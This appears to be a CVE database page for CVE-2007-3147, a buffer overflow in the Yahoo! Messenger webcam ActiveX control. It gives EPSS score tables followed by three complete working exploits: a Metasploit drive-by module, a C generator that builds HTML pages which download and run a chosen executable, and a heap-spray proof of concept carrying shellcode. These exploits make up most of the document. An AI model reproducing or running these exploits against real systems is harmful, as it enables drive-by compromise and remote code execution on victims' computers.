CVE-2007-3147 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	76.48%	–	–
2023-03-12	–	–	–	92.71%	–
2023-05-14	–	–	–	93.73%	–
2023-06-18	–	–	–	93.15%	–
2024-02-04	–	–	–	94.02%	–
2024-03-10	–	–	–	93.83%	–
2024-04-14	–	–	–	93.76%	–
2024-06-02	–	–	–	94.03%	–
2024-06-30	–	–	–	95.01%	–
2024-12-22	–	–	–	86.69%	–
2025-01-19	–	–	–	86.69%	–
2025-03-18	–	–	–	–	58.5%
2025-03-18	–	–	–	–	58.5,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	99%
2023-03-12	98%
2023-05-14	99%
2023-06-18	99%
2024-02-04	99%
2024-03-10	99%
2024-04-14	99%
2024-06-02	99%
2024-06-30	99%
2024-12-22	99%
2025-01-19	99%
2025-03-18	98%
2025-03-18	98%

## # $Id: yahoomessenger_server.rb 9525 2010-06-15 07:18:08Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249. By sending a overly long string to the "Server()" method, and then calling the "Send()" method, an attacker may be able to execute arbitrary code. Using the payloads "windows/shell_bind_tcp" and "windows/shell_reverse_tcp" yield for the best results. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], 'Version' => '$Revision: 9525 $', 'References' => [ [ 'CVE', '2007-3147' ], [ 'OSVDB', '37082' ], [ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 800, 'BadChars' => "\x00\x09\x0a\x0d'\\", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP0/SP1 Pro English', { 'Offset' => 1032, 'Ret' => 0x71aa32ad } ], [ 'Windows 2000 Pro English All', { 'Offset' => 1032, 'Ret' => 0x75022ac4 } ] ], 'DisclosureDate' => 'Jun 5 2007', 'DefaultTarget' => 0)) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Randomize some things vname = rand_text_alpha(rand(100) + 1) strname = rand_text_alpha(rand(100) + 1) # Set the exploit buffer sploit = rand_text_alpha(target['Offset'] - p.encoded.length) + p.encoded sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V') sploit << [0xe8, -775].pack('CV') + rand_text_alpha(500) # Build out the message content = %Q|<html> <object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277' id='#{vname}'></object> <script language='javascript'> #{strname} = new String('#{sploit}') #{vname}.server = #{strname} #{vname}.send() </script> </html> | print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end

/* Compile in LCC-win32 (Free!) Download and exec any file you like! Have Fun! */ #include <stdio.h> #include <string.h> #include <stdlib.h> char *file = "Click_here.html"; FILE *fp = NULL; unsigned char sc[] = "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03" "\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74" "\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E" "\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03" "\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C" "\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40" "\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C" "\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC" "\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F" "\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB" "\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83" "\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF" "\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"; char *url = NULL; unsigned char sc_2[] = "\x00\x98"; char * header = "<html>\n" "<object classid=\"clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277\" id='viewme'></object>\n" "<body>\n" "<SCRIPT language=\"javascript\">\n" "var shellcode = unescape(\"%u9090%u9090%u9090%u9090\" + \n"; char * footer = "\n\n" "bigblock = unescape(\"%u9090%u9090\");\n" "headersize = 20;\n" "slackspace = headersize+shellcode.length;\n" "while (bigblock.length<slackspace) bigblock+=bigblock;\n" "fillblock = bigblock.substring(0, slackspace);\n" "block = bigblock.substring(0, bigblock.length-slackspace);\n" "while(block.length+slackspace<0x40000) block = block+block+fillblock;\n" "memory = new Array();\n" "for (x=0; x<500; x++) memory[x] = block + shellcode;\n" "var buffer = '\\x0a';\n" "while (buffer.length < 5000) buffer+='\\x0a\\x0a\\x0a\\x0a';\n" "viewme.server = buffer;\n" "viewme.initialize();\n" "viewme.send();\n"; char * trigger_1 = "</script>\n" "</body>\n" "</html>\n"; // print unicode shellcode void PrintPayLoad(char *lpBuff, int buffsize) { int i; for(i=0;i<buffsize;i+=2) { if((i%16)==0) { if(i!=0) { printf("\"\n\""); fprintf(fp, "%s", "\" +\n\""); } else { printf("\""); fprintf(fp, "%s", "\""); } } printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]); fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]); } printf("\";\n"); fprintf(fp, "%s", "\");\n"); fflush(fp); } void main(int argc, char **argv) { unsigned char buf[1024] = {0}; int sc_len = 0; int n; if (argc < 2) { printf("\r\nYahoo 0day Ywcupl.dll ActiveX Exploit Download And Exec\n"); printf("link:http://research.eeye.com/html/advisories/upcoming/20070605.html\n"); printf("link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856 \n"); printf("link:http://secunia.com/advisories/25547/\n"); printf("greetz to Jambalaya for helping with this code\n"); printf("\r\nUsage: %s <URL> [htmlfile]\n", argv[0]); printf("\r\nE.g.: %s http://www.malwarehere.com/rootkit.exe exploit.html\r\n\n", argv[0]); printf("=-Excepti0n-=\n"); exit(1); } url = argv[1]; if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10) { printf("[-] Invalid url. Must start with 'http://','ftp://'\n"); return; } printf("[+] download url:%s\n", url); if(argc >=3) file = argv[2]; printf("[+] exploit file:%s\n", file); fp = fopen(file, "w"); if(!fp) { printf("[-] Open file error!\n"); return; } //build Exploit HTML File fprintf(fp, "%s", header); fflush(fp); memset(buf, 0, sizeof(buf)); sc_len = sizeof(sc)-1; memcpy(buf, sc, sc_len); memcpy(buf+sc_len, url, strlen(url)); sc_len += strlen(url); memcpy(buf+sc_len, sc_2, 1); sc_len += 1; PrintPayLoad((char *)buf, sc_len); fprintf(fp, "%s", footer); fflush(fp); fprintf(fp, "%s", trigger_1); fflush(fp); printf("[+] exploit write to %s success!\n", file); } // =-Excepti0n-= // milw0rm.com [2007-06-08]

<html> <!-- 45 minutes of fuzzing! Great results! very relible, runs calc.exe, replace with shellcode of your choice!!! link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856 maybe more vulz! Greetz to: str0ke and shinnai! --> <html> <object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277' id='target'></object> <script> shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" + "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + "%uCC4A%uD0FF"); bigblock = unescape("%u9090%u9090"); headersize = 20; slackspace = headersize+shellcode.length while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (x=0; x<800; x++) memory[x] = block + shellcode; var buffer = '\x0a'; while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a'; target.server = buffer; target.initialize(); target.send(); </script> </html> sometimes 0a0a0a0a0a is not as good as 0d0d0d0d or 11111111 # milw0rm.com [2007-06-07]